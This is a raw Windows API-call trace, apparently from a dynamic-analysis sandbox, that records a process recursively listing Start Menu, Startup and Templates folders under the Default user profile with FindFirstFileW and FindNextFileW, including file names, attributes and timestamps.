	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6246d030, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6246d030, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 1
	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6246d030, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6246d030, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="On-Screen Keyboard.lnk", cAlternateFileName="ON-SCR~1.LNK")) returned 0
	[0102.365] FindClose (in: hFindFile=0x213bf0 | out: hFindFile=0x213bf0) returned 1
	[0102.366] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cd228a7, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6cd228a7, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="Command Prompt.lnk", cAlternateFileName="COMMAN~1.LNK")) returned 1
	[0102.366] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93532dc2, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6f762f74, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1
	[0102.366] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f73ce14, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6f73ce14, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x518, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notepad.lnk", cAlternateFileName="")) returned 1
	[0102.366] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3554d69, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd357aec9, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Run.lnk", cAlternateFileName="")) returned 1
	[0102.366] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89fee20b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1
	[0102.366] lstrcmpiW (lpString1="System Tools", lpString2=".") returned 1
	[0102.366] lstrcmpiW (lpString1="System Tools", lpString2="..") returned 1
	[0102.366] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\System Tools\\\\*", lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89fee20b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213bf0
	[0102.368] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.368] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89fee20b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.369] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd365f70b, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd368586b, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="computer.lnk", cAlternateFileName="")) returned 1
	[0102.369] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd361344b, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd36395ab, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1
	[0102.369] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x935a51df, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89fee20b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1
	[0102.369] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0af95e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89fa1f4a, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (No Add-ons).lnk", cAlternateFileName="INTERN~1.LNK")) returned 1
	[0102.369] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b47a471, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4c6731, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 1
	[0102.369] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b47a471, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b1f740, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b4c6731, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Private Character Editor.lnk", cAlternateFileName="PRIVAT~1.LNK")) returned 0
	[0102.369] FindClose (in: hFindFile=0x213bf0 | out: hFindFile=0x213bf0) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd34bc7e8, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd34bc7e8, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd34e2948, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0
	[0102.370] FindClose (in: hFindFile=0x213bb0 | out: hFindFile=0x213bb0) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1
	[0102.370] lstrcmpiW (lpString1="Administrative Tools", lpString2=".") returned 1
	[0102.370] lstrcmpiW (lpString1="Administrative Tools", lpString2="..") returned 1
	[0102.370] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Administrative Tools\\\\*", lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213bb0
	[0102.370] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.370] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.370] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.370] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.370] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0bdde20, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0bdde20, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0102.370] FindClose (in: hFindFile=0x213bb0 | out: hFindFile=0x213bb0) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0af95e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0af95e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8a01436b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1
	[0102.370] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd35ed2ea, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1
	[0102.370] lstrcmpiW (lpString1="Maintenance", lpString2=".") returned 1
	[0102.371] lstrcmpiW (lpString1="Maintenance", lpString2="..") returned 1
	[0102.371] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Maintenance\\\\*", lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd35ed2ea, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213bb0
	[0102.371] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.371] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd35ed2ea, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.371] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.371] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.371] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x935cb33e, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd35ed2ea, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1
	[0102.371] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd35c718a, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd35c718a, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 1
	[0102.371] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd35c718a, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xd35c718a, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="Help.lnk", cAlternateFileName="")) returned 0
	[0102.371] FindClose (in: hFindFile=0x213bb0 | out: hFindFile=0x213bb0) returned 1
	[0102.371] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1
	[0102.371] lstrcmpiW (lpString1="Startup", lpString2=".") returned 1
	[0102.371] lstrcmpiW (lpString1="Startup", lpString2="..") returned 1
	[0102.371] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*", lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213bb0
	[0102.372] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.372] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.372] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.372] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.372] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0af95e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.372] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0af95e0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0102.372] FindClose (in: hFindFile=0x213bb0 | out: hFindFile=0x213bb0) returned 1
	[0102.372] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0af95e0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f2890e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 0
	[0102.372] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.372] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0
	[0102.372] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.372] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0f8ec9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69d14532, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0102.372] lstrcmpiW (lpString1="Templates", lpString2=".") returned 1
	[0102.372] lstrcmpiW (lpString1="Templates", lpString2="..") returned 1
	[0102.372] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Templates\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0f8ec9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69d14532, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.373] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.373] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0f8ec9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69d14532, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.373] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.373] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.373] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa0f8ec9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x69d14532, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.373] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.373] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0bb7cc0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7ebc3f9f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1
	[0102.373] lstrcmpiW (lpString1="Themes", lpString2=".") returned 1
	[0102.373] lstrcmpiW (lpString1="Themes", lpString2="..") returned 1
